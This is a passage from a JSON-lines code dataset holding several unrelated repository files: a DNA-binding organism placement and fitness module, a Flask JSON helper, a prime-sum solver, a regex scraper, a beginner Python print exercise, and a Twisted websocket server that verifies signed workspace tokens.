scores are computed there.\n\t\t\t\t# This is to avoid adding the gap-to-gap score (instead of\n\t\t\t\t# the diagonal score) that has replaced a diagonal score, as we move\n\t\t\t\t# further right (because otherwise you could \"carry\" multiple gap\n\t\t\t\t# scores\n tmp_gap_scores = scores_matrix[i,:].copy() # vector of length n+1\n tmp_gap_pointers = pointers_matrix[:,i,:].copy() # 2 x (n+1) matrix\n \n\t\t\t\t# for each column of the matrix\n for j in range(1, n + 1):\n # Compute all the possible values from all the possible\n # horizontal moves (gaps) that land on [i,j]\n for start in range(j):\n gap_size = j - start\t# obtain distance for connector\n\t\t\t\t\t\t# obtain PSSM index, which is also the connector index\n\t\t\t\t\t\t# because this is the preceding PSSM\n pssm_idx = self.row_to_pssm[i][0]\n\t\t\t\t\t\t# evaluate the score for connector given distance\n\t\t\t\t\t\t# the DNA sequence length (n) is needed for the connector\n\t\t\t\t\t\t# background model\n gap_score = self.get_gap_score(pssm_idx, gap_size, n)\n\t\t\t\t\t\t# add cumulative score (using the score matrix, which has\n\t\t\t\t\t\t# not been modified by horizontal scores)\n candidate_score = scores_matrix[i, start] + gap_score\n \n\t\t\t\t\t\t# assess whether temp scores should be overwritten\n\t\t\t\t\t\t# that is, whether this gap is better than other gaps\n if candidate_score >= tmp_gap_scores[j]:\n # Write horizontal score if better than existing\n tmp_gap_scores[j] = candidate_score\n # Annotate \"where we came from\" in the tmp_gap_pointers\n tmp_gap_pointers[0,j] = i # row idx of the origin\n tmp_gap_pointers[1,j] = start # column idx of the origin\n \n \n # Update the original matrices\n\t\t\t\t# tmp_gap_scores contains the updated matrix, with the diagnonal moves\n\t\t\t\t# and any best horizontal moves replacing them if adequate\n scores_matrix[i,:] = tmp_gap_scores\n pointers_matrix[:,i,:] = tmp_gap_pointers\n \n # Get best binding energy (max value on bottom row)\n last_row = scores_matrix[-1,:]\n best = max(last_row)\n \n # BACKTRACKING\n if traceback or print_out or out_file != None:\n # Position of best (where backtracking starts from)\n best_i = m # it always comes from the last row by definition\n # if multiple positions in last row have best value, pick first\n # to initiate traceback\n best_j = int(np.where(last_row == best)[0][0]) # column of best value\n \n # Traverse back the matrix from the best element in the last row\n # and store the alignment path\n \t\t# traverse_matrix is a recursive function that will generate the path\n \t\t# taken by the optimal alignment\n alignment_path = []\n alignment_path = self.traverse_matrix(pointers_matrix, best_i, best_j, alignment_path)\n alignment_path.reverse() # Top-down instead of bottom-up\n \n # Get scores and positions of all the nodes of the organism\n node_scores, node_positions, cols_of_0_gaps = self.get_node_positions_and_energies(\n alignment_path, scores_matrix, pointers_matrix, dna_sequence\n )\n \n # Print placement\n if print_out == True:\n self.print_placement(node_positions, node_scores,\n cols_of_0_gaps, dna_sequence, \n print_out=True)\n # Print to file\n if out_file != None:\n self.print_placement(node_positions, node_scores,\n cols_of_0_gaps, dna_sequence, \n print_out=False, out_file=out_file)\n\n # Split node-scores into recognizers-scores and connectors-scores\n # Remove token node [first row is treated as a node, to provide\n # a start position for the following recognizer, by tracking its\n # end]\n node_scores = node_scores[1:] \n recognizers_scores = []\n connectors_scores = []\n for i in range(len(node_scores)):\n if i % 2 == 0:\n recognizers_scores.append(node_scores[i])\n else:\n connectors_scores.append(node_scores[i])\n # if no backtracking, return empty lists for recognizer_scores and\n # connector_scores\n else:\n recognizers_scores = []\n connectors_scores = [] \n \n # Return output dictionary\n output_dict = {\"energy\": best,\n \"recognizers_scores\": recognizers_scores,\n \"connectors_scores\": connectors_scores}\n \n return output_dict\n\n def get_seq_fitness(self, s_dna: str, traceback=False, print_out = False) -> dict:\n \"\"\"Return the fitness of the organism for a given DNA sequence\n\n Args:\n s_dna: DNA sequence to analize\n\n Returns:\n score, blocked and blockers\n\n Description:\n This function implements the placement behavior for organism.\n The placement problem is defined as who to best position an\n organism on a sequence (i.e. how to maximize its fitness given\n \"\"\"\n #invoke placement function\n placed_org=self.get_placement(s_dna, traceback, print_out)\n \n # Set energy threshold method and value\n E_threshold_method = self.energy_threshold_method\n E_threshold_value = self.energy_threshold_value\n \n # Apply lower bound to energy if required\n if E_threshold_method == \"organism\":\n if placed_org[\"energy\"] < E_threshold_value:\n placed_org[\"energy\"] = E_threshold_value\n \n # return score, blocks and blockers and PSSMs scores in that sequence\n return placed_org\n \n \n def get_additive_fitness(self, a_dna: list, traceback=False, \n print_out = False, use_gini=False) -> dict:\n \"\"\"Return the total Fitness for an array of DNA sequences and the\n chosen fitness method\n\n Args:\n a_dna: list of dna sequences\n\n Returns:\n average/sum of the energy of the organism on each sequence\n\t\t\taverage of the gini coefficient of the organism's recognizers on each sequence\n \"\"\"\n\n scores = []\n ginis = []\n\t\t# for each sequence in the provided sequence set\n for s_dna in a_dna:\n #do traceback only if Gini is requested\n if use_gini:\n \t\t\t# get the energy and pssm scores\n sfit = self.get_seq_fitness(s_dna, traceback=True)\n else:\n sfit = self.get_seq_fitness(s_dna)\n energy = sfit[\"energy\"] # energy\n pssm_scores = sfit[\"recognizers_scores\"] # PSSMs scores\n\n if use_gini:\n \t\t\t# compute and append the Gini coefficient\n if len(pssm_scores) > 0:\n gini = gini_RSV(pssm_scores) # Gini coefficient\n ginis.append(gini) \n\t\t\t\n\t\t\t# append energy\n scores.append(energy)\n \n score_stdev = np.std(scores)\n if self.cumulative_fit_method == \"sum\":\n # Compute fitness score as sum over the positive scores\n score = np.sum(scores)\n \n elif self.cumulative_fit_method == \"mean\":\n # Compute fitness score as average positive score\n score = np.mean(scores)\n \n elif self.cumulative_fit_method == \"median\":\n # Compute fitness score as median positive score\n score = np.median(scores)\n \n # Compute the average Gini coefficient as the geometric mean\n if len(ginis) == 0: # Case where no gini is requested\n avg_gini = 0 # minimum penalty is arbitrarily assigned\n else:\n avg_gini = np.prod(ginis) ** (1/len(ginis)) # geometric mean\n \n return {\"score\": score, \"stdev\" : score_stdev, \"avg_gini\": avg_gini}\n \n def get_binding_energies(self, a_dna: list, traceback=False, \n print_out = False, use_gini=False) -> list:\n \"\"\"Return the binding energies for an array of DNA sequences.\n\n Args:\n a_dna: list of dna sequences\n\n Returns:\n list of binding eneregies\n \"\"\"\n\n scores = []\n\t\t# for each sequence in the provided sequence set\n for s_dna in a_dna:\n sfit = self.get_seq_fitness(s_dna)\n energy = sfit[\"energy\"]\n scores.append(energy)\n \n return scores\n\n def get_kolmogorov_fitness(self, pos_dataset: list, neg_dataset: list,\n traceback=False, print_out = False, \n use_gini=False) -> float:\n \"\"\"Returns the organism's fitness, defined as the Kolmogorov-Smirnov\n test statistic. This is bounded in [0,1].\n Test null assumes the samples are drawn from the same (continuous)\n distribution.\n The statistic is sensitive to differences in both location and shape \n of the empirical cumulative distribution functions of the two samples.\n Args:\n pos_dataset: list of dna sequences in the positive dataset\n neg_dataset: list of dna sequences in the negative dataset\n Returns:\n fitness assigned to the organism\n \"\"\" \n # Values on the positive set\n pos_values = []\n ginis = []\n for s_dna in pos_dataset:\n #do traceback only if Gini is requested\n if use_gini:\n \t\t\t# get the energy and pssm scores\n sfit = self.get_seq_fitness(s_dna, traceback=True)\n else: \n sfit = self.get_seq_fitness(s_dna)\n \n pos_values.append(sfit[\"energy\"]) # get sequence energy score\n pssm_scores = sfit[\"recognizers_scores\"] # PSSMs scores\n if use_gini:\n \t\t\t# compute and append the Gini coefficient\n if len(pssm_scores) > 0:\n gini = gini_RSV(pssm_scores) # Gini coefficient\n ginis.append(gini)\n \n # Compute the average Gini coefficient as the geometric mean\n if len(ginis) == 0: # Case where no Gini was requested\n avg_gini = 0 # minimum penalty is arbitrarily assigned\n else:\n avg_gini = np.prod(ginis) ** (1/len(ginis)) # geometric mean\n \n # Values on the negative set\n neg_values = []\n for s_dna in neg_dataset:\n sfit = self.get_seq_fitness(s_dna)\n neg_values.append(sfit[\"energy\"]) # get sequence energy score\n \n # Compute fitness score as a Boltzmannian probability\n kolmogorov_fitness = ks_2samp(pos_values, neg_values).statistic\n \n return {\"score\": kolmogorov_fitness, \"avg_gini\": avg_gini} \n \n def get_boltz_fitness(self, pos_dataset: list, neg_dataset: list,\n genome_length: int, traceback=False, \n print_out = False, use_gini=False) -> float:\n \"\"\"Returns the organism's fitness, defined as the probability that the regulator binds a\n positive sequence. All the binding energies are turned into probabilities according to a\n Boltzmannian distribution. The probability of binding a particular sequence, given the binding\n energy on that sequence, is p = e**binding_energy / Z\n where Z is the partition function.\n A high number of negative sequences is assumed to be present (emulating the environment of a\n regulator that needs to find its targets on an entire genome).\n A coefficient called neg_factor is computed, so that the value of Z can be as high as if there\n were as\tmany negative sequences as required to cover the entire genome.\n\n Args:\n pos_dataset: list of dna sequences in the positive dataset\n neg_dataset: list of dna sequences in the negative dataset\n genome_length: integer representing the length of the genome\n\n Returns:\n fitness assigned to the organism\n \"\"\"\n \n # Values on the positive set\n pos_values = []\n ginis = []\n for s_dna in pos_dataset:\n #do traceback only if Gini is requested\n if use_gini:\n \t\t\t# get the energy and pssm scores\n sfit = self.get_seq_fitness(s_dna, traceback=True)\n else: \n sfit = self.get_seq_fitness(s_dna)\n boltz_exp = np.e**sfit[\"energy\"] # exp(energy)\n pssm_scores = sfit[\"recognizers_scores\"] # PSSMs scores\n if use_gini:\n \t\t\t# compute and append the Gini coefficient\n if len(pssm_scores) > 0:\n gini = gini_RSV(pssm_scores) # Gini coefficient\n ginis.append(gini)\n\n pos_values.append(boltz_exp)\n \n # Compute the average Gini coefficient as the geometric mean\n if len(ginis) == 0: # Case where no Gini was requested\n avg_gini = 0 # minimum penalty is arbitrarily assigned\n else:\n avg_gini = np.prod(ginis) ** (1/len(ginis)) # geometric mean\n \n # Values on the negative set\n neg_values = []\n neg_lengths = []\n for s_dna in neg_dataset:\n sfit = self.get_seq_fitness(s_dna)\n boltz_exp = np.e**sfit[\"energy\"] # exp(energy)\n neg_values.append(boltz_exp)\n neg_lengths.append(len(s_dna))\n \n # Scaling factor, used to over-represent the negative scores, so that\n # it simulates a genome of specified length\n neg_factor = genome_length//sum(neg_lengths)\n \n # Partition function\n Z = sum(pos_values) + neg_factor * sum(neg_values)\n \n # Compute fitness score as a Boltzmannian probability\n boltz_fitness = sum(pos_values) / Z\n \n return {\"score\": boltz_fitness, \"avg_gini\": avg_gini}\n\n def count_nodes(self) -> int:\n \"\"\"Returns the number of nodes of the organism\n\n Returns:\n Number of nodes of the organism\n \"\"\"\n\n return 2 * len(self.recognizers) - 1\n \n def count_connectors(self) -> int:\n \"\"\"Returns the number of connectors of the organism\n\n Returns:\n Number of connectors.\n \"\"\"\n \n return len(self.connectors)\n\n def count_recognizers(self) -> int:\n \"\"\"Returns the number of recognizers of the organism\n\n Returns:\n Number of recognizers.\n \"\"\"\n \n return len(self.recognizers)\n \n def sum_pssm_lengths(self) -> int:\n \"\"\"Returns the sum of the lengths of all the PSSMs of the organism.\n \"\"\"\n \n sum_lengths = 0\n for pssm in self.recognizers:\n sum_lengths += pssm.length\n \n return sum_lengths\n \n def get_gap_score(self, connector_idx, d, s_dna_len):\n \"\"\"Calls the appropriate connector, with the given distance and length of the DNA sequence to\n\t\t obtain the energy of the connector.\n\t\t\"\"\"\n if d == s_dna_len:\n return -1 * np.inf\n \n gap_score = self.connectors[connector_idx].get_score(d, s_dna_len)\n return gap_score\n \n def get_score_from_pssm(self, row_idx_from_placement_matrix, nucleotide):\n \"\"\"Calls the appropriate PSSM (and column) to obtain the score, given a nucleotide\n\t\t\"\"\"\n pssm_index = self.row_to_pssm[row_idx_from_placement_matrix][0]\n pssm_column = self.row_to_pssm[row_idx_from_placement_matrix][1]\n pssm_object = self.recognizers[pssm_index]\n score = pssm_object.pssm[pssm_column][nucleotide]\n return score\n \n def get_diag_score(self, pointers_mat, row_idx, col_idx, dna_sequence):\n \"\"\"Evaluates and returns a substitution score (diagonal move), using\n\t\t get_score_from_pssm and taking into account several special cases.\n\t\t row_idx and col_idx identify the \"destination\" cell [the cell being\n\t\t evaluated]\n\t\t\"\"\"\n \n diag_score = 0\n \n # Check if it is a gap of zero bp\n\t\t# This means two PSSMs back to back, which then must incorporate a zero\n\t\t# gap score\n if self.is_a_0_bp_gap(pointers_mat, row_idx, col_idx):\n # Call connector, for a zero bp gap evaluation, add it to the\n\t\t\t# diagonal score [connector needs to the length of the DNA seq]\n pssm_idx = self.row_to_pssm[row_idx][0]\n connector = self.connectors[pssm_idx - 1]\n zero_gap_score = connector.get_score(0, len(dna_sequence))\n diag_score += zero_gap_score\n \n\t\t# get nucleotide and compute PSSM score for it\n nucleotide = dna_sequence[col_idx - 1] \n pssm_score = self.get_score_from_pssm(row_idx, nucleotide)\n diag_score += pssm_score\n \n return diag_score\n \n def is_first(self, row_idx_from_placement_matrix):\n \"\"\"Returns true if we are on the first element of a PSSM recognizer\n\t\t\"\"\"\n pssm_col = self.row_to_pssm[row_idx_from_placement_matrix][1]\n if pssm_col == 0:\n return True\n else:\n return False\n \n def is_last(self, row_idx_from_placement_matrix): \n \"\"\"Returns true if we are on the last element of a PSSM recognizer\n\t\t\"\"\"\n\t\t# if next one is a first, then we are at a last ;-)\n if self.is_first(row_idx_from_placement_matrix + 1):\n return True\n else:\n return False\n \n def is_a_0_bp_gap(self, pointers_mat, row_idx, col_idx):\n \"\"\"Tells whether the cell defines a contiguous diagonal\n\t\t run between two PSSMs\n\t\t\"\"\"\n\n\t\t# if the row does not correspond to the first column of a PSSM\n if self.is_first(row_idx)==False:\n return False\n \n\t\t# if the row IS a first column of a PSSM\n\t\t# get row index of diagonal-up-left cell\n\t\t# this should be the row of the cell pointing to the\n\t\t# end of the previous PSSM\n pointer_row_idx = pointers_mat[0][row_idx-1, col_idx-1]\n \n\t\t# the equality below, will only be true, if there was\n\t\t# a diagonal move. this, combined with the fact that we know\n\t\t# that this was a PSSM last row, identifies that the diagonal\n\t\t# up-left element comes from a PSSM diagonal score\n\t\t# (so you really have a back-to-back PSSM situation)\n if pointer_row_idx == row_idx-2:\n return True\n else:\n return False\n \n def traverse_matrix(self, pointers_mat, i, j,\n alignment_path=[], from_gap_flag=False) -> list:\n \"\"\"Recursive function used for traceback\n\t\t - i and j are the starting positions\n\t\t - alignment_path is the path that is filled up recursively\n\t\t - from_gap_flag identifies the case that we got to this position from a gap\n\t\t and we therefore MUST go diagonal (no gap concatenation is allowed)\n\t\t\"\"\"\n \n # End of the recursion\n if i == None: # the top row has been reached\n return alignment_path\n \n\t\t# add current cell coordinates to path\n alignment_path.append([i,j])\n \n\t\t# avoid double gaps\n if from_gap_flag == True:\n # move diagonally\n i_next = i - 1\n j_next = j - 1\n\t # or move back through annotated pointer\n else:\n # move where the pointers-matrix says\n i_next = pointers_mat[0, i, j]\n j_next = pointers_mat[1, i, j]\n \n\t\t# if moving horizontally, indicate that with flag\n if i_next == i:\n return self.traverse_matrix(pointers_mat, i_next, j_next,\n alignment_path, from_gap_flag=True)\n else:\n return self.traverse_matrix(pointers_mat, i_next, j_next,\n alignment_path,from_gap_flag=False)\n\n \n def get_node_positions_and_energies(self, alignment_path, scores_matrix,\n pointers_matrix, dna_seq) -> list:\n \"\"\"Takes the alignment path and the completed score and pointer matrices.\n Returns a list that contains:\n - node_scores: score of recognizer/connector node\n - node_placements_right_ends: column of matrix where placement of node ends\n - columns_of_0_bp_gaps: column with special contiguous recognizer case\n \n The alignment path is already reversed, so first element is top-left.\n \n Function goes through the alignment path and reports where each node\n ends (column in alingment matrix)\n\t\t\"\"\"\n \n # Use the path to get info about individual positions and score of all the\n # nodes of the organism\n \n node_scores = []\n previous_score = 0\n node_placements_right_ends = []\n previous_element = [None, None]\n columns_of_0_bp_gaps = []\n \n # for each element of the alignment path\n for element in alignment_path:\n row, column = element\n \n # if we are on a row where gaps are allowed (PSSM ends or connector)\n if self.is_last(row):\n \n # if we just landed on this row via a diagonal move, then \n # this is a PSSM end\n if previous_element[0] == row - 1:\n # The PSSM score needs to be recomputed (it could have been\n # over-written by a gap-score)\n \n score = self.get_diag_score(pointers_matrix, row,\n column, dna_seq)\n cumulative_score = scores_matrix[row-1, column-1] + score\n \n # this was a gap, so no need to recompute score\n else:\n cumulative_score = scores_matrix[row, column]\n \n # compute the node score, by substracting from cumulative\n node_score = cumulative_score - previous_score\n node_scores.append(node_score)\n previous_score = cumulative_score\n \n # mark its last position on matrix (right end)\n node_placements_right_ends.append(column)\n \n # if we are on the first position of a new pssm which is adjacent to\n # the previous one (gap of 0 bp), the cumulative score we read also\n # contains the score of the first position of the PSSM (not only the\n # connector score)\n if self.is_a_0_bp_gap(pointers_matrix, row, column):\n \n \n nucleotide = dna_seq[column - 1] \n pssm_contribution = self.get_score_from_pssm(row, nucleotide)\n \n \n cell_score = scores_matrix[row, column]\n # Remove the pssm contribution, so that the cumulative score\n # doesn't include the first position of the next PSSM, but only the\n # contribution from the connector\n cumulative_score = cell_score - pssm_contribution\n node_score = cumulative_score - previous_score\n node_scores.append(node_score)\n previous_score = cumulative_score\n \n node_placements_right_ends.append(column)\n \n columns_of_0_bp_gaps.append(column)\n \n \n previous_element = [row, column]\n \n \n return [node_scores, node_placements_right_ends, columns_of_0_bp_gaps]\n \n def print_placement(self, node_right_ends, node_scores,\n cols_of_0_gaps, dna_seq, \n print_out = True, out_file = None):\n \"\"\"For a dna_seq, it prints out the placement of the node on text or file.\n \n Gets:\n - node_right_ends: last position [col] of nodes in alignment matrix\n - node_scores: scores of nodes\n \n In the alignment matrix we have an extra column (-infs).\n We also have an extra row, which we are modeling as a \"virtual\" node,\n with its associated \"right_end\".\n Once we remove the extra column, the position of the previous node\n \"right end\" on the matrix turn out to be the position of the current\n node on the sequence.\n \"\"\"\n n = len(dna_seq)\n dashed_line = [\"-\"] * n\n dotted_line_1 = [\"_\"] * n\n dotted_line_2 = [\"_\"] * n\n \n # for each node start\n for i in range(len(node_right_ends) - 1):\n \n # get sequence coordinates for the node\n start = node_right_ends[i]\n stop = node_right_ends[i+1]\n \n # get the node score and format it\n node_score = node_scores[i+1]\n node_score_str = \"{:.2f}\".format(node_score)\n \n # if this is a recognizer (even numbers on chain)\n if i % 2 == 0:\n \n # Detect a post 0-bp gap recognizer (special case)\n if start in cols_of_0_gaps:\n start -= 1\n \n # write recognizer placement\n for pos in range(start, stop):\n dashed_line[pos] = str(i)\n \n # write recognizer score\n for c in range(len(node_score_str)):\n if start + c < len(dotted_line_1): # avoid going out of the seq\n dotted_line_1[start + c] = node_score_str[c]\n \n # if this is a connector\n else:\n # get size of gap\n gap_size = stop - start\n \n # if the gap is large, the connector score is written in the middle\n if gap_size > len(node_score_str) + 1:\n right_shift = int(np.ceil((gap_size - len(node_score_str))/2))\n start += right_shift\n \n # More centered printing for small gaps\n else:\n start -= 2\n \n # write connector score\n for c in range(len(node_score_str)):\n if start + c < len(dotted_line_1): # avoid goin out of the seq\n dotted_line_2[start + c] = node_score_str[c]\n \n # print to stdout if required\n if print_out:\n print(dna_seq)\n print(\"\".join(dashed_line))\n print(\"\".join(dotted_line_1))\n print(\"\".join(dotted_line_2))\n \n # print to file if required\n if out_file != None:\n print(dna_seq, file=out_file)\n print(\"\".join(dashed_line), file=out_file)\n print(\"\".join(dotted_line_1), file=out_file)\n print(\"\".join(dotted_line_2), file=out_file)\n \n \n def get_random_connector(self) -> int:\n \"\"\"Returns the index of a random connector of the organism\n\n Returns:\n Integer between 0 and N-1 (both included), where N is the number of\n connectors the organism has.\n \"\"\"\n \n num_connectors = self.count_connectors()\n return random.randint(0, num_connectors - 1)\n\n\n def get_random_recognizer(self) -> int:\n \"\"\"Returns the index of a random recognizer of the organism\n\n Returns:\n Integer between 0 and N-1 (both included), where N is the number of\n recognizers the organism has.\n \"\"\"\n \n num_recognizers = self.count_recognizers()\n \n return random.randint(0, num_recognizers - 1)\n \n def break_chain(self, connector_to_break, bond_to_keep):\n \"\"\"Brakes an organism at the specified link and returns the resulting\n pair of chunks into a list. Each chunk is a dictionary with two keys:\n \"recognizers\" and \"connectors\".\n\n Parameters\n ----------\n connector_to_break : int\n Index of the connector where the chain will be broken.\n bond_to_keep : str\n If \"left\" the connector where the split occurs will stay linked to\n the left chunk, while its right bond will be broken (the opposite\n happens if its value is \"right\".\n\n Returns\n -------\n list\n A list with two elements, which are the two chunks of the splitted\n chain, both represented as a dictionary with two keys:\n \"recognizers\" and \"connectors\" (which point to lists of recognizers\n or connectors, respectively).\n\n \"\"\"\n \n # Recognizers of left and right chunks\n L_recognizers = self.recognizers[:connector_to_break + 1]\n R_recognizers = self.recognizers[connector_to_break + 1:]\n \n # Connectors of left and right chunks\n if bond_to_keep==\"left\":\n L_connectors = self.connectors[:connector_to_break + 1]\n R_connectors = self.connectors[connector_to_break + 1:]\n elif bond_to_keep==\"right\":\n L_connectors = self.connectors[:connector_to_break]\n R_connectors = self.connectors[connector_to_break:]\n else:\n raise Exception('bond_to_keep needs to be \"left\" or \"right\".')\n \n L_chunk = {\"recognizers\": L_recognizers, \"connectors\": L_connectors}\n R_chunk = {\"recognizers\": R_recognizers, \"connectors\": R_connectors}\n \n L_chunk_copy = copy.deepcopy(L_chunk)\n R_chunk_copy = copy.deepcopy(R_chunk)\n \n return [L_chunk_copy, R_chunk_copy]\n \n def set_connectors(self, connectors_list):\n \"\"\"Set the connectors of the organism to be those provided in the input\n list.\n \"\"\"\n \n self.connectors = connectors_list\n \n def set_recognizers(self, recognizers_list):\n \"\"\"Set the recognizers of the organism to be those provided in the\n input list.\n \"\"\"\n \n self.recognizers = recognizers_list\n\n def print(self) -> None:\n \"\"\"Prints the whole tree data structure\n \"\"\"\n \n print(\"***** Organism {} *****\".format(self._id))\n for i in range(len(self.recognizers) - 1):\n self.recognizers[i].print()\n self.connectors[i].print()\n self.recognizers[-1].print()\n\n def export(self, filename: str) -> None:\n \"\"\"Exports the whole tree data structure\n\n Args:\n filename: Name of the file to export the organism\n \"\"\"\n organism_file = open(filename, \"w+\")\n organism_file.write(\"***** Organism {} *****\".format(self._id))\n \n for i in range(len(self.recognizers) - 1):\n self.recognizers[i].export(organism_file)\n self.connectors[i].export(organism_file)\n self.recognizers[-1].export(organism_file)\n\n organism_file.write(\"\\n\")\n organism_file.close()\n\n def export_results(self, a_dna: list, filename: str) -> None:\n \"\"\"Exports the binding profile of the organism against each of the \n DNA sequences provided as a list\n\n Args:\n filename: Name of the file to export sequences\n a_dna: list fo sequences to export\n\n \"\"\"\n \n ofile = open(filename, \"w\")\n # for every DNA sequence\n for s_dna in a_dna:\n # call fitness evaluation for sequence with file printing option\n sfit = self.get_placement(s_dna.lower(), traceback=True,\n print_out = False, out_file = ofile)\n ofile.close()\n\n\n def print_result(self, s_dna: str) -> None:\n \"\"\"Prints the binding profile of the organism against the \n provided DNA sequence \n \n Args:\n s_dna: DNA sequence to export\n\n Returns:\n DNA sequence and binding sites of the organisms recognizer\n \"\"\"\n\n s_dna = s_dna.lower()\n\n # call fitness evaluation for sequence\n sfit = self.get_placement(s_dna.lower(), traceback=True,\n print_out = True)\n","repo_name":"ErillLab/TF_GP","sub_path":"src/objects/organism_object.py","file_name":"organism_object.py","file_ext":"py","file_size_in_byte":60086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"73481064453","text":"\nfrom decimal import Decimal\nfrom json import dumps\n\nfrom flask import current_app, request\n\n\ndef serialize(obj):\n \"\"\"JSON serializer for objects not serializable by default orjson dumps\"\"\"\n\n if isinstance(obj, Decimal):\n return str(obj)\n\n return obj.to_json()\n\n\ndef is_json_client() -> bool:\n try:\n return \"application/json\" in request.headers.get(\"Accept\")\n except TypeError:\n return False\n\n\ndef json_res(code=200, **kwargs):\n\n kwargs[\"http_status_code\"] = code\n\n response = current_app.response_class(\n response=dumps(kwargs, default=serialize),\n status=int(code),\n mimetype=\"application/json\",\n )\n\n return response","repo_name":"ibraheemalayan/ENCS3340-AI-PathFinder-WebApp","sub_path":"finder_app/utils/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"44"} +{"seq_id":"30468366734","text":"'''\nAuthor: Ashutosh Srivastava\nPython3 solution\n'''\n\nimport math\ndef sieve_of_erasthosthenes(arr,n):\n for i in range(2,int(math.sqrt(n))+1):\n if(arr[i] != False):\n for j in range(i*i,n+1,i):\n arr[j]=False\n return arr\n\nfor _ in range(int(input())):\n data=int(input())\n list_=[True for i in range(data+1)]\n arr=sieve_of_erasthosthenes(list_,data)\n arr[1]=False\n for i in range(0,data):\n if(arr[i] and arr[data-i]):\n print(i,data-i)\n break\n","repo_name":"ashutosh65000/Coding-Questions","sub_path":"even_number_as_a_sum_of_two_prime_number.py","file_name":"even_number_as_a_sum_of_two_prime_number.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"14873524742","text":"import re\r\n\r\nr = open('DualBlades.txt','r')\r\ns = r.read()\r\nw = open('DualBladesRaw.txt', 'w+')\r\n\r\nst = re.findall(r\"[\\da-z/<>]{3,}\",s)\r\nj = \"\"\r\nfor i in st:\r\n\ti = re.findall(r\">[0-9]{2,}\",i)\r\n\tj = ''.join(i)\r\n\tj = j[1:]\r\n\tprint(j)\r\n\tw.write('\\n' + j)\r\n\r\nprint(len(st))\r\nr.close()\r\nw.close()\r\n","repo_name":"Lintik/MHWDB","sub_path":"DualBlades/DualBladesRaw.py3","file_name":"DualBladesRaw.py3","file_ext":"py3","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"42603804085","text":"# display the strings for the beginning of Mary had a little lamb\nprint(\"Mary had a little lamb.\")\nprint(\"Its fleece was white as {}.\".format('snow')) # insert 'snow' into the string\nprint(\"And everywhere that Mary went.\")\n# make a row of 10 periods\nprint(\".\" * 10)\n\n# declare a bunch of string variables\nend1 = \"C\"\nend2 = \"h\"\nend3 = \"e\"\nend4 = \"e\"\nend5 = \"s\"\nend6 = \"e\"\nend7 = \"B\"\nend8 = \"u\"\nend9 = \"r\"\nend10 = \"g\"\nend11 = \"e\"\nend12 = \"r\"\n\n# display the words made by adding all the new variables together\n# the end=' ' makes a space between the words instead of a line break\nprint(end1 + end2 + end3 + end4 + end5 + end6, end=' ')\nprint(end7 + end8 + end9 + end10 + end11 + end12)\n","repo_name":"kristinbrooks/lpthw","sub_path":"src/ex7.py","file_name":"ex7.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"29432896970","text":"import json\nimport logging\nimport itsdangerous\n\nimport Cookie\nimport server.utils\nimport server.utils.logger\nfrom collections import defaultdict\nfrom Queue import Queue, Empty\n\nfrom twisted.internet import reactor\n# from twisted.python import log\n\nfrom autobahn.twisted.websocket import (\n WebSocketServerFactory,\n WebSocketServerProtocol\n)\n\nfrom server.models import Workspace\n\nlogger = server.utils.logger.get_logger(__name__)\nchanges_queue = Queue()\n\n\nclass BroadcastServerProtocol(WebSocketServerProtocol):\n\n def onConnect(self, request):\n protocol, headers = None, {}\n # see if there already is a cookie set ..\n logger.debug('Websocket request {0}'.format(request))\n if 'cookie' in request.headers:\n try:\n cookie = Cookie.SimpleCookie()\n cookie.load(str(request.headers['cookie']))\n except Cookie.CookieError:\n pass\n return (protocol, headers)\n\n def onMessage(self, payload, is_binary):\n from server.web import app\n \"\"\"\n We only support JOIN and LEAVE workspace messages.\n When authentication is implemented we need to verify\n that the user can join the selected workspace.\n When authentication is implemented we need to reply\n the client if the join failed.\n \"\"\"\n if not is_binary:\n message = json.loads(payload)\n if message['action'] == 'JOIN_WORKSPACE':\n if 'workspace' not in message or 'token' not in message:\n logger.warning('Invalid join workspace message: '\n '{}'.format(message))\n self.sendClose()\n return\n signer = itsdangerous.TimestampSigner(app.config['SECRET_KEY'],\n salt=\"websocket\")\n try:\n workspace_id = signer.unsign(message['token'], max_age=60)\n except itsdangerous.BadData as e:\n self.sendClose()\n logger.warning('Invalid websocket token for workspace '\n '{}'.format(message['workspace']))\n logger.exception(e)\n else:\n with app.app_context():\n workspace = Workspace.query.get(int(workspace_id))\n if workspace.name != message['workspace']:\n logger.warning(\n 'Trying to join workspace {} with token of '\n 'workspace {}. Rejecting.'.format(\n message['workspace'], workspace.name\n ))\n self.sendClose()\n else:\n self.factory.join_workspace(\n self, message['workspace'])\n if message['action'] == 'LEAVE_WORKSPACE':\n self.factory.leave_workspace(self, message['workspace'])\n\n def connectionLost(self, reason):\n WebSocketServerProtocol.connectionLost(self, reason)\n self.factory.unregister(self)\n\n def sendServerStatus(self, redirectUrl=None, redirectAfter=0):\n self.sendHtml('This is a websocket port.')\n\n\nclass WorkspaceServerFactory(WebSocketServerFactory):\n \"\"\"\n This factory uses the changes_queue to broadcast\n message via websockets.\n\n Any message put on that queue will be sent to clients.\n\n Clients subscribe to workspace channels.\n This factory will broadcast message to clients subscribed\n on workspace.\n\n The message in the queue must contain the workspace.\n \"\"\"\n def __init__(self, url):\n WebSocketServerFactory.__init__(self, url)\n # this dict has a key for each channel\n # values are list of clients.\n self.workspace_clients = defaultdict(list)\n self.tick()\n\n def tick(self):\n \"\"\"\n Uses changes_queue to broadcast messages to clients.\n broadcast method knowns each client workspace.\n \"\"\"\n try:\n msg = changes_queue.get_nowait()\n self.broadcast(json.dumps(msg))\n except Empty:\n pass\n reactor.callLater(0.5, self.tick)\n\n def join_workspace(self, client, workspace):\n logger.debug('Join workspace {0}'.format(workspace))\n if client not in self.workspace_clients[workspace]:\n logger.debug(\"registered client {}\".format(client.peer))\n self.workspace_clients[workspace].append(client)\n\n def leave_workspace(self, client, workspace_name):\n logger.debug('Leave workspace {0}'.format(workspace_name))\n self.workspace_clients[workspace_name].remove(client)\n\n def 